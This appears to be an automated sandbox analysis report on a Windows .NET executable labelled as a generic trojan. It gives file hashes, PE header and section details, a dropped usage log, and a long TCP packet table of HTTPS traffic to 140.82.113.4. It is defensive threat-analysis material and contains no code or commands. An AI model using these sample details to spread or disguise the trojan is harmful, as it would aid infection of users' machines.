                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):1721
                                                                                Entropy (8bit):5.388832516468223
                                                                                Encrypted:false
                                                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKk9HU+vxp3/elT:iq+wmj0qCYqGSI6oPtzHeqKk9XZp/elT
                                                                                MD5:A9C75E4DC6040B8404644996F91FCE4C
                                                                                SHA1:26C4BECC9D23087A18BF5DBC99F0F4D4F4B9EC8B
                                                                                SHA-256:92CE8582BEE514FA23A910E22BEFAC3279FC50BD080CAB5447CEFBF3DB79DDDD
                                                                                SHA-512:78AFC9F5FCF89BB6256430ED554CA529E62E7D766AC38DF46C22D7EE32ACE42894C2A3846FA813276A1F6AD754EB278201F3AEF5F34D930D1B6B79779D1EB4D8
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):5.840280501310309
                                                                                TrID:
                                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                                File name:SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                File size:40'960 bytes
                                                                                MD5:26c95e5acba77d7fd14d109c94f75cca
                                                                                SHA1:56359d96cd63d66b51eb49acd46d8df25f170c30
                                                                                SHA256:32272f676a500007b4321f7c076ec3169305615e230dad3d89c63e0cfd24c1c6
                                                                                SHA512:6b2bd0a6240a13b641d005dc34cd364fd5eb2bb861d49d33bf826766ea0daf4a264f1182905363720b6a8bfad03d97386e965863578e57cf2cf5403d1309363a
                                                                                SSDEEP:768:1pc7ngE+7L+Phy83dWrz7lwHZjl7GdoUNIBBv5r:1Aj+7100rz7lwHj7QSBvJ
                                                                                TLSH:7F038D11E7ECC63FEDBF53B9A87110125331E756A242EB4D9E49C29D2857BC40362BA3
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...N.Z..........."...0.................. ....@...... ....................................`................................

                                                                                File Icon

                                                                                Icon Hash:00928e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x400000
                                                                                Entrypoint Section:
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0xFB5ACD4E [Mon Aug 20 05:46:54 2103 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                dec ebp
                                                                                pop edx
                                                                                nop
                                                                                add byte ptr [ebx], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax+eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x5b6.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb5d00x38.text
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x96880x9800edb2a420e5b39dbc9d15de519dd7b15dFalse0.5008480674342105data5.912071669901782IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xc0000x5b60x600fe6f1eccb28a48477c54500b80aa1963False0.41796875data4.09473911739944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_VERSION0xc0a00x32cdata0.4236453201970443
                                                                                RT_MANIFEST0xc3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Feb 23, 2024 14:28:20.682204008 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:20.682259083 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:20.682384014 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:20.705780983 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:20.705811977 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:20.915826082 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:20.916002035 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:20.921539068 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:20.921552896 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:20.921850920 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:20.980700970 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.029246092 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.069916964 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346609116 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346681118 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346739054 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346776962 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346788883 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.346832991 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346848011 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.346873045 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346904039 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346914053 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.346923113 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.346940041 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.397844076 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.397864103 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.440521955 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.440562010 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.440593958 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.440604925 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.440622091 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.440634966 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.440942049 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.440985918 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.440993071 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441035032 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441092014 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441137075 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.441143990 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441190004 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.441199064 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441442013 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441489935 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441494942 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.441504955 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441540956 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.441590071 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441679955 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441724062 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441756964 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.441765070 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.441798925 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.441804886 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.491581917 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.533898115 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.533953905 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.533978939 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534003019 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534028053 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534032106 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534056902 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534074068 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534092903 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534097910 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534138918 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534166098 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534172058 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534185886 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534254074 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534262896 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534373999 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534409046 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534410000 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534420967 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534455061 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534460068 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534486055 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534580946 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534621000 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534630060 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534657001 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534658909 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534667969 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534710884 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534715891 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534760952 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534805059 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534827948 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534845114 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534852982 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534869909 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534879923 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534909010 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534914970 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534921885 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534950018 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.534957886 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.534964085 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.535001993 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.535008907 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.535069942 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.535101891 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.535131931 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.535132885 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.535145044 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.535167933 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.535183907 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.535217047 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.535222054 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.585334063 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627433062 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627500057 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627521992 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627547979 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627557039 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627574921 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627588034 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627592087 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627628088 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627644062 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627675056 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627708912 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627722025 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627743959 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627748966 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627758980 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627799988 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627804995 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627804995 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627816916 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627847910 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627855062 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627861977 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627896070 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.627899885 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627906084 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.627958059 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628007889 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628025055 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628031969 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628057003 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628084898 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628118992 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628135920 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628149986 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628175974 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628197908 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628206015 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628237963 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628253937 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628263950 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628278971 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628345013 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628384113 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628391027 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628498077 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628535032 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628555059 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628581047 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628587008 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628612041 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628622055 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628665924 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628671885 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628724098 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628752947 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628771067 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.628777981 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628956079 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.628998995 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629004955 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629013062 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629075050 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629082918 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629086971 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629108906 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629147053 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629159927 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629184008 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629218102 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629224062 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629228115 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629252911 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629296064 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629296064 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629307985 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629322052 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629376888 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629384041 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629426003 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629431009 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629498005 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629503965 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629539967 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629554033 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629560947 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629609108 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629614115 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629642010 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629673958 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629690886 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629698992 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629733086 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629756927 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629762888 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.629806995 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.629878998 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.630387068 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.721731901 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.721995115 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722096920 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722104073 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.722146988 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722187996 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.722204924 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722351074 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722445011 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722445965 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.722467899 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722628117 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.722629070 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722647905 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722809076 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722852945 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.722875118 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.722973108 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723017931 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723025084 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723069906 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723095894 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723320007 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723335981 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723385096 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723392010 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723424911 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723464012 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723510027 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723525047 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723536015 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723575115 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723651886 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723689079 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723711967 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723720074 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723750114 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723784924 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723829985 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723840952 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723850965 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723903894 CET49709443192.168.2.8140.82.113.4
                                                                                Feb 23, 2024 14:28:21.723948002 CET44349709140.82.113.4192.168.2.8
                                                                                Feb 23, 2024 14:28:21.723995924 CET49709443192.168.2.8140.82.113.4
